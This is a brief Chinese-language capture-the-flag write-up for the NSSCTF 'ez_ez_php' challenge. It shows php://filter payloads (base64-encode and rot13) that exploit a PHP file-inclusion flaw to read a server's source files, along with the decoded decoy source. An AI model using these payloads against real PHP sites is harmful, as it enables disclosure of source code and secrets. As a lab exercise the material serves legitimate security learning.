NSSCTF ez_ez_php

开启环境:

?看到三个等号,用php://filter协议:

?file=php://filter/read=convert.base64-encode/resource=flag.php

?得到base64编码的内容,base64解码得:

<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");


echo   "NSSCTF{flag_is_not_here}" ."<br/>";
echo "real_flag_is_in_'flag'"."<br/>";
echo "换个思路，试试PHP伪协议呢";

使用php伪协议rot13:

?file=php://filter/write=string.rot13/resource=flag